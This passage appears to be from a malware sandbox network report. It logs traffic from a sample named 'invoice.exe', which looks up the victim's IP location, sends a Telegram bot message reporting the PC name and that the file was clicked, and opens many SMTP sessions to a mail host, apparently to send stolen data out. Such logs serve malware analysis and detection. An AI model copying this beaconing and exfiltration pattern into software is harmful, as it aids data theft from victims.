2024-10-01 04:16:10 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 04:16:10 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
7	192.168.2.4	49751	188.114.96.3	443	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 04:16:11 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 04:16:11 UTC	682	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:11 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 72202 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=SfNZu44%2BYltbNnE2gNFqhUZFLAI1UrsEoX4KwSpFQrmXQsurRNSZTHR750tiMtT2J%2FJtz4IzE%2F66m0gBoqj0q9dxA7Yrb1Gvuxt09nXO%2Fla3mmNk%2B%2BCA7XfeHbc5QQuO06WatkQp"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb9a2c6e9ab4249-EWR
2024-10-01 04:16:11 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 04:16:11 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
8	192.168.2.4	49753	188.114.96.3	443	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 04:16:12 UTC	84	OUT	GET /xml/8.46.123.33 HTTP/1.1 Host: reallyfreegeoip.org Connection: Keep-Alive
2024-10-01 04:16:12 UTC	680	IN	HTTP/1.1 200 OK Date: Tue, 01 Oct 2024 04:16:12 GMT Content-Type: application/xml Transfer-Encoding: chunked Connection: close access-control-allow-origin: * vary: Accept-Encoding Cache-Control: max-age=86400 CF-Cache-Status: HIT Age: 72203 Last-Modified: Mon, 30 Sep 2024 08:12:49 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wa%2B1gleq5ehr0DTDOSkV71KYme76CnF%2BMzHURRzAyIDtJG9BGbnmtl%2BGA35EHF5B%2BcJANHriF4ktsLl%2BSiQNKecb0F9ZuWCRyb4kYsFaV2HKtMTqPh4a0hnrEfxVPR7H97VbkzWE"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 8cb9a2d00aee43ec-EWR
2024-10-01 04:16:12 UTC	340	IN	Data Raw: 31 34 64 0d 0a 3c 52 65 73 70 6f 6e 73 65 3e 0a 09 3c 49 50 3e 38 2e 34 36 2e 31 32 33 2e 33 33 3c 2f 49 50 3e 0a 09 3c 43 6f 75 6e 74 72 79 43 6f 64 65 3e 55 53 3c 2f 43 6f 75 6e 74 72 79 43 6f 64 65 3e 0a 09 3c 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 55 6e 69 74 65 64 20 53 74 61 74 65 73 3c 2f 43 6f 75 6e 74 72 79 4e 61 6d 65 3e 0a 09 3c 52 65 67 69 6f 6e 43 6f 64 65 3e 3c 2f 52 65 67 69 6f 6e 43 6f 64 65 3e 0a 09 3c 52 65 67 69 6f 6e 4e 61 6d 65 3e 3c 2f 52 65 67 69 6f 6e 4e 61 6d 65 3e 0a 09 3c 43 69 74 79 3e 3c 2f 43 69 74 79 3e 0a 09 3c 5a 69 70 43 6f 64 65 3e 3c 2f 5a 69 70 43 6f 64 65 3e 0a 09 3c 54 69 6d 65 5a 6f 6e 65 3e 41 6d 65 72 69 63 61 2f 43 68 69 63 61 67 6f 3c 2f 54 69 6d 65 5a 6f 6e 65 3e 0a 09 3c 4c 61 74 69 74 75 64 65 3e 33 37 2e 37 35 Data Ascii: 14d<Response><IP>8.46.123.33</IP><CountryCode>US</CountryCode><CountryName>United States</CountryName><RegionCode></RegionCode><RegionName></RegionName><City></City><ZipCode></ZipCode><TimeZone>America/Chicago</TimeZone><Latitude>37.75
2024-10-01 04:16:12 UTC	5	IN	Data Raw: 30 0d 0a 0d 0a Data Ascii: 0

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
9	192.168.2.4	49754	149.154.167.220	443	7644	C:\Users\user\Desktop\invoice.exe

Timestamp	Bytes transferred	Direction	Data
2024-10-01 04:16:13 UTC	349	OUT	GET /bot/sendMessage?chat_id=&text=%20%0D%0A%0D%0APC%20Name:760639%0D%0ADate%20and%20Time:%2001/10/2024%20/%2011:41:05%0D%0ACountry%20Name:%20United%20States%0D%0A%5B%20760639%20Clicked%20on%20the%20File%20If%20you%20see%20nothing%20this's%20mean%20the%20system%20storage's%20empty.%20%5D HTTP/1.1 Host: api.telegram.org Connection: Keep-Alive
2024-10-01 04:16:13 UTC	344	IN	HTTP/1.1 404 Not Found Server: nginx/1.18.0 Date: Tue, 01 Oct 2024 04:16:13 GMT Content-Type: application/json Content-Length: 55 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection
2024-10-01 04:16:13 UTC	55	IN	Data Raw: 7b 22 6f 6b 22 3a 66 61 6c 73 65 2c 22 65 72 72 6f 72 5f 63 6f 64 65 22 3a 34 30 34 2c 22 64 65 73 63 72 69 70 74 69 6f 6e 22 3a 22 4e 6f 74 20 46 6f 75 6e 64 22 7d Data Ascii: {"ok":false,"error_code":404,"description":"Not Found"}

SMTP Packets

Timestamp	Source Port	Dest Port	Source IP	Dest IP	Commands
Oct 1, 2024 06:16:19.986937046 CEST	587	49761	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:16:19 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:16:19.987509966 CEST	49761	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:16:20.154509068 CEST	587	49761	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:16:20.154778004 CEST	49761	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:16:20.318151951 CEST	587	49761	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:16:24.371664047 CEST	587	49762	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:16:24 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:16:24.371881008 CEST	49762	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:16:24.537324905 CEST	587	49762	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:16:24.537457943 CEST	49762	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:16:24.701865911 CEST	587	49762	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:16:29.002747059 CEST	587	49763	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:16:28 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:16:29.002916098 CEST	49763	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:16:29.166764975 CEST	587	49763	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:16:29.166907072 CEST	49763	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:16:29.332920074 CEST	587	49763	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:16:50.205518007 CEST	587	50419	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:16:50 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:16:50.205693007 CEST	50419	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:16:50.365411043 CEST	587	50419	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:16:50.365712881 CEST	50419	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:16:50.527650118 CEST	587	50419	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:16:53.299773932 CEST	587	50420	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:16:53 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:16:53.299935102 CEST	50420	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:16:53.463123083 CEST	587	50420	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:16:53.463287115 CEST	50420	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:16:53.660953999 CEST	587	50420	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:16:56.166157961 CEST	587	50421	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:16:56 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:16:56.166368008 CEST	50421	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:16:56.336234093 CEST	587	50421	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:16:56.336519957 CEST	50421	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:16:56.499929905 CEST	587	50421	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:16:58.874366045 CEST	587	50422	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:16:58 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:16:58.874531984 CEST	50422	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:16:59.038213968 CEST	587	50422	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:16:59.044905901 CEST	50422	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:16:59.210656881 CEST	587	50422	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:01.936018944 CEST	587	50423	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:01 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:01.936180115 CEST	50423	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:02.102893114 CEST	587	50423	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:02.103035927 CEST	50423	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:02.270541906 CEST	587	50423	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:04.822168112 CEST	587	50424	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:04 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:04.822365999 CEST	50424	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:04.982862949 CEST	587	50424	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:04.983073950 CEST	50424	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:05.145929098 CEST	587	50424	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:07.712824106 CEST	587	50425	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:07 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:07.712991953 CEST	50425	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:07.873770952 CEST	587	50425	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:07.873961926 CEST	50425	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:08.035486937 CEST	587	50425	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:10.423970938 CEST	587	50426	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:10 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:10.424165964 CEST	50426	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:10.584928989 CEST	587	50426	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:10.585050106 CEST	50426	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:10.745740891 CEST	587	50426	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:13.271056890 CEST	587	50427	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:13 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:13.271219969 CEST	50427	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:13.447833061 CEST	587	50427	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:13.448425055 CEST	50427	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:13.617547035 CEST	587	50427	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:16.042752981 CEST	587	50428	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:15 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:16.043550968 CEST	50428	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:16.204032898 CEST	587	50428	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:16.207397938 CEST	50428	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:16.372598886 CEST	587	50428	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:19.008877993 CEST	587	50429	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:18 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:19.011432886 CEST	50429	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:19.171931028 CEST	587	50429	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:19.172172070 CEST	50429	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:19.344434977 CEST	587	50429	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:21.786206961 CEST	587	50430	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:21 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:21.786458015 CEST	50430	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:21.956743002 CEST	587	50430	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:21.984340906 CEST	50430	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:22.158236980 CEST	587	50430	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:24.645090103 CEST	587	50431	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:24 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:24.645205975 CEST	50431	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:24.827496052 CEST	587	50431	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:24.827645063 CEST	50431	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:25.009661913 CEST	587	50431	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:28.214622021 CEST	587	50432	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:28 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:28.214761972 CEST	50432	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:28.839936972 CEST	587	50433	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:28 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:28.840218067 CEST	50433	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:29.004432917 CEST	587	50433	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:29.007627010 CEST	50433	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:29.175683022 CEST	587	50433	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:31.590662956 CEST	587	50434	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:31 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:31.590854883 CEST	50434	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:31.769846916 CEST	587	50434	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:31.769989967 CEST	50434	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:31.954678059 CEST	587	50434	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:34.527842045 CEST	587	50435	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:34 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:34.528125048 CEST	50435	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:34.691668034 CEST	587	50435	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:34.692236900 CEST	50435	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:34.857950926 CEST	587	50435	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:37.318608999 CEST	587	50436	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:37 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:37.318746090 CEST	50436	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:37.480022907 CEST	587	50436	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:37.493891954 CEST	50436	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:37.654583931 CEST	587	50436	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:40.027559996 CEST	587	50437	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:39 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:40.027712107 CEST	50437	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:40.187489986 CEST	587	50437	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:40.209252119 CEST	50437	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:40.369359970 CEST	587	50437	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:42.815769911 CEST	587	50438	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:42 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:42.816047907 CEST	50438	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:42.980046988 CEST	587	50438	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:42.994678020 CEST	50438	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:43.164812088 CEST	587	50438	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:45.638262033 CEST	587	50439	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:45 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:45.638566017 CEST	50439	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:45.802429914 CEST	587	50439	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:45.802573919 CEST	50439	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:45.968483925 CEST	587	50439	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:48.419986963 CEST	587	50440	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:48 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:48.421667099 CEST	50440	587	192.168.2.4	198.54.114.247	EHLO 760639
Oct 1, 2024 06:17:48.587151051 CEST	587	50440	198.54.114.247	192.168.2.4	250-server62.web-hosting.com Hello 760639 [8.46.123.33] 250-SIZE 52428800 250-8BITMIME 250-PIPELINING 250-PIPECONNECT 250-STARTTLS 250 HELP
Oct 1, 2024 06:17:48.589663029 CEST	50440	587	192.168.2.4	198.54.114.247	STARTTLS
Oct 1, 2024 06:17:48.763170004 CEST	587	50440	198.54.114.247	192.168.2.4	220 TLS go ahead
Oct 1, 2024 06:17:51.244262934 CEST	587	50441	198.54.114.247	192.168.2.4	220-server62.web-hosting.com ESMTP Exim 4.96.2 #2 Tue, 01 Oct 2024 00:17:51 -0400 220-We do not authorize the use of this system to transport unsolicited, 220 and/or bulk e-mail.
Oct 1, 2024 06:17:51.247301102 CEST	50441	587	192.168.2.4	198.54.114.247	EHLO 760639
